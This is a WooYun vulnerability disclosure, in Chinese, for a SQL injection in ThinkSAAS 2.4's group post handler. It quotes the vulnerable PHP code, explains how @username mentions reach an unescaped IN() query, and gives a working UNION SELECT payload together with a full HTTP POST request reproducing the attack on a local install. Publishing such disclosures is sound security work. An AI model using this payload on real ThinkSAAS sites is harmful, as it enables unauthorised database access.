当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111518

漏洞标题:ThinkSAAS 最新版注入

相关厂商:thinksaas.cn

漏洞作者: testing

提交时间:2015-05-10 18:25

修复时间:2015-08-13 18:26

公开时间:2015-08-13 18:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-10: 细节已通知厂商并且等待厂商处理中
2015-05-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-07-09: 细节向核心白帽子及相关领域专家公开
2015-07-19: 细节向普通白帽子公开
2015-07-29: 细节向实习白帽子公开
2015-08-13: 细节向公众公开

简要描述:

ThinkSAAS 2.4

详细说明:

app\group\action\add.php 60行开始

// 执行发布帖子
case "do" :

......省略......

$groupid = intval ( $_POST ['groupid'] );
$title = trim( $_POST ['title'] );

$content = tsClean( $_POST ['content'] );
$typeid = intval ( $_POST ['typeid'] );
$tag = $_POST ['tag'];

......省略......

// 处理@用户名
if (preg_match_all ( '/@/', $content, $at )) {
preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches );

$unames = $matches [1];

$ns = "'" . implode ( "','", $unames ) . "'";

$csql = "username IN($ns)";

if ($unames) {

$query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );

foreach ( $query as $v ) {
$content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content );
$msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array (
'id' => $topicid
) );
aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content );
}
$new ['group']->update ( 'group_topic', array (
'topicid' => $topicid
), array (
'content' => $content
) );
}
}

......省略......


tsClean函数

function tsClean($text) {
$text = stripslashes(trim($text));
//去除前后空格,并去除反斜杠
//$text = br2nl($text); //将br转换成/n
///////XSS start
require_once 'thinksaas/xsshtml.class.php';
$xss = new XssHtml($text);
$text = $xss -> getHtml();
//$text = substr ($text, 4);//去除左边<p>标签
//$text = substr ($text, 0,-5);//去除右边</p>标签
///////XSS end
//$text = html_entity_decode($text,ENT_NOQUOTES,"utf-8");//把 HTML 实体转换为字符
//$text = strip_tags($text); //去掉HTML及PHP标记
//$text = cleanJs ( $text );
$text = htmlentities($text, ENT_NOQUOTES, "utf-8");
//把字符转换为 HTML 实体
return $text;
}


$_POST ['content']在初始化时经过addslashes,进入 tsClean函数stripslashes除去了转义,再除去xss代码,赋给content
变量。
preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches ); 判断文章内容是否有@某个用户,如果有则提取@的用户名。
$ns = "'" . implode ( "','", $unames ) . "'";
$csql = "username IN($ns)";
最后进入$csql ,并执行$query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );
可以闭合单引号,实现注入。
对查询的结果,进行如下处理。

$query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" );

foreach ( $query as $v ) {
$content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content );
$msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array (
'id' => $topicid
) );
aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content );
}
$new ['group']->update ( 'group_topic', array (
'topicid' => $topicid
), array (
'content' => $content
) );


将原文章内容中 @admin 的形式替换成 [@admin:1111]这种形式。最后在显示时[@admin:1111]会转化为:
<a '="" uid="1111" rel="face" href="http://127.0.0.1/thinksaas/index.php?app=user&ac=space&id=1111 ">@admin</a>
显示出注入结果。
前提:系统存在2个账户,例如admin和test。
于是构造payload,把content赋值:
<p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p>
会执行select userid,username from user_info where username IN('admin')/**/union/**/select/**/version(),'test'#')
payload被替换为:
<p>aaaa [@admin:1111]')/**/union/**/select/**/version(),'test'# aaaaaa[@test:注入结果] aaaa<br/></p>
http包:

POST /thinksaas/index.php?app=group&ac=add&ts=do HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/thinksaas/index.php?app=group&ac=add&id=1
Cookie: c_secure_ssl=bm9wZQ%3D%3D; c_secure_uid=MQ%3D%3D; c_secure_pass=d2f4d9c199d480bde1c7527ab5f00f67; c_secure_tracker_ssl=bm9wZQ%3D%3D; c_secure_login=bm9wZQ%3D%3D; PHPSESSID=v56iku742gj03lrpu8dhmhqrn6; ts_autologin=6wgf4rovqk4c8ckso04wswosg0owwc0; ts_email=admin%40admin.com
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16131784015115
Content-Length: 788
-----------------------------16131784015115
Content-Disposition: form-data; name="title"
sql
-----------------------------16131784015115
Content-Disposition: form-data; name="content"
<p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p>
-----------------------------16131784015115
Content-Disposition: form-data; name="tag"
-----------------------------16131784015115
Content-Disposition: form-data; name="iscomment"
0
-----------------------------16131784015115
Content-Disposition: form-data; name="iscommentshow"
0
-----------------------------16131784015115
Content-Disposition: form-data; name="groupid"
1
-----------------------------16131784015115
Content-Disposition: form-data; name="token"
79e185a1215f76ec26e0aa120ec8240f0eb3aa1a
-----------------------------16131784015115--


QQ截图20150501174213.jpg

漏洞证明:

官网有云waf,只做了本地复现

修复方案:

版权声明:转载请注明来源 testing@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-13 18:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无